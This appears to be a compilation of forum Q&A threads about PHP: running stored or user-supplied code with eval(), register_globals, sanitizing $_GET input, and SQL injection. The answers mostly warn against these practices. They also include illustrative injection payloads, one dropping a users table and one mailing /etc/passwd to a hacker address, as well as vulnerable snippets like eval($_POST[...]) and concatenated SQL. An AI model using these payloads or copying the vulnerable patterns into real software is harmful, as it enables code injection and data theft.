I want to be able to store PHP code in an SQL Database and display that whenever it is called. I don't want to use include and make loads of files. I want to be able to just put them all in SQL and call them when I want. How can I do this?
I have
$GETPAGE = "SELECT PA_CONTENT from pages where PA_NAME = '$page'";
$GETPAGE2= mysql_query($GETPAGE);
$GETPAGE3= mysql_fetch_array($GETPAGE2);
echo $GETPAGE3[PA_CONTENT];
but it echo's it out visible. Should I replace echo for something else?
Thanks
You can use eval() to execute code that's in strings. Just make sure that you absolutely trust the code that's being run - it will run any PHP code it's given, so it could do malicious things if it's so instructed.
You can evaluate a string as code by using eval()
http://php.net/manual/en/function.eval.php
BUT this is not recommended, see also the warning on that page:
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Related
$input = $_GET['name'];
eval("\$name= \"$input\";");
Or it is insecure? Thanks. Without any php functions, like preg_replace or any other, just working with user data as string type with \" when put it to eval function.
This basically will allow the user to inject arbitrary code into your application. Think something in the line of
$input=";mysql_query(\"DROP TABLE users\")"
Also eval makes it basically impossible to cache anything but that is a minor consequence.
I know that eval is the function in PHP to execute PHP code from an input. Now I want to make a W3Schools like editor. What can I do to protect eval code that I get from POST variable.
$code = eval($_POST["phpusercode"]);
echo $code;
What I want to do is when a user will make a function like this
I want to give user the ability to write his own PHP code on my site without making my website vulnerable to some sort of hacking.
eval evaluates code, so, as #sectus says in comments, execute the code
For example:
eval ("echo 'Hello user'"); //This will execute echo 'Hello user'
So, in your case i think you don't want to execute your user code, so please carify your question and update it.
IMPORTANT:
Use of eval is highly discouraged
NEVER EVER use eval with params by POST/GET without sanitize them
Useful links:
When eval is evil
Avoid SQL injection
I'm using Yii framework.
I want to make a php string into php action.
$var = 'echo "hello";';
//Something to do to run $var
I want to print $var how can I do that?
There is a simple parse php from string option on Yii framework?
You may use eval() function. But, eval is evil in many cases and generally such way of coding makes code harder to follow and debug. Beware for potential unsafe input from user, because, if, for instance, you do
eval('echo "$var"')
and $var was set directly from $_POST, one may set
$var='lol"; mail("hacker#somewhere.com", "Some passwords", "/bin/cat /etc/passwd");' (provided, that webserver is under user that may have access to such functions and directories; even is not, it gives a plenty of opportunities to exploit such vulnerability). So, generally eval is bad idea, but sometimes it is the only solution. Anyway, be very careful.
eval — Evaluate a string as PHP code
Evaluates the given code as PHP.
Caution
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
http://php.net/manual/en/function.eval.php
$this->evaluateExpression($var);
First of all, I heard some web-servers allow you to reach parameter with $a instead of $_GET[a], this is not the case here.
Anyway, I have to reach a multiple times, so instead of doing $a = $_GET[a], I instead use $_GET[a] everytime. In single php tag as in <?php ?>, is that an issue, should I absolutely use variables? does it matter?
Another thing is my php file is really scrambled in my html, I wonder if does it matter with multiple gets?(should not, im just worried)
Thanks.
What you refer of using just $a instead of $_GET['a'] (or $_POST['a'] too) is an old feature known as register_globals. This feature was dangerous and leading to messy code, so it was considered deprecated in PHP 5.3 and finally removed in PHP 5.4.
Then, using $_GET['a'] everywhere in your scripts may lead to problems, because you should never trust user input (all things coming from $_GET, $_POST, $_REQUEST, $_COOKIE and some from $_FILES or $_SERVER). It is recommended to do something like $a = sanitize($_GET['a']); (the sanitize function does not exist, depending on what type of value are you expecting, you should check that what you get is an integer, or a valid date, or whatever, depending on your needs). From now on you should stop referencing $_GET['a'] and use instead the new sanitized variable you have just created $a. Because if you were using always $_GET['a'], chances are that you forget to sanitize it someplace.
Also, before sending this sanitized variable into a SQL query, you should escape it or use it inside a prepared statement to avoid SQL injections. Before outputting it to an html for the user to see, use htmlspecialchars to avoid XSS attacks.
And finally, about having multiple php blocks mixed with html blocks, this is only bad for maintenance reasons, because in the long run it will be a complete mess. Try to separate the html you send the user from the php code. Try to read something about the MVC pattern (Model-View-Controller) (this link is probably too complicated or maybe you don't see the utility right now for you that are just beginning with php (at least I didn't see how it was way better than mixing html with php, for all the complexity needed), but try to grasp the idea behind it) .
First of all, I heard some web-servers allow you to reach parameter with $a instead of $_GET[a], this is not the case here.
This is a PHP config setting called register_globals. It is insecure and should NOT be used. See this question for more information.
You can access an element in the $_GET array as many times as you like, it will not cause problems. However if you are printing an element of the $_GET array (or any other user submitted data) to the page, you should run it through htmlspecialchars() or the like before printing it out to prevent XSS vulnerabilities.
using a variable is a preference for you to decide it does not matter. but variable is the way forward if you use the same one multiple times.
<?php echo htmlspecialchars($_GET['a']);?>
using a variable means that it reusable again especially if you have added extra code, which mean just editing one variable for all instances.
<?php $a = htmlspecialchars($_GET['a']);
echo $a;
echo $a;
echo $a;
echo $a;
?>
So this is my code. Now how do I use $pubname in another file.
mysqli_select_db($connect,"membership");
$retname = "select username from users where email='$globalname' limit 1";
$rn = mysqli_query($connect,$retname) or die(mysqli_error($connect));
$name = mysqli_fetch_array($rn);
//connecting for mathcing username with fullname and displaying it
$pubname = mysqli_real_escape_string($name['username']);
include('profile.php');
echo $pubname;
and also is this code secure? I did that...does not work yet.
Include the file you would like the variable to be accessible within, like so
include('somefile.php')
and at the top of that file you might need put something like [depending on server configurations]
global $pubname
But in most cases you would not need to do this.
In regards to security, depending on how $pubname is set, your query may or may not be prone to sql injection.
Note: There are other means to include() files such as include_once(), require() and require_once(), from php.net:
The documentation below also applies
to require(). The two constructs are
identical in every way except how they
handle failure. include() produces a
Warning while require() results in a
Fatal Error. In other words, use
require() if you want a missing file
to halt processing of the page.
include() does not behave this way,
the script will continue regardless.
Be sure to have an appropriate
include_path setting as well. Be
warned that parse error in required
file doesn't cause processing halting
in PHP versions prior to PHP 4.3.5.
Since this version, it does.
To use $pubname in another script, keep it as global variable. You don't need to echo it. (As caveat: global variables should be used sparingly, preferrably lumped into an array.)
As far as security is concerned: You should use mysqli_real_escape_string rather on $globalname right before you use it. And escape the $pubname only right before you use that in the next query. As it looks now, you are encoding the output needlessly, but forgot to do escape the input - which _escape_string is actually meant for.
to use pubname in a nother file. first you have to include the file where pubname was set/created.
then use include() or require() function to call it.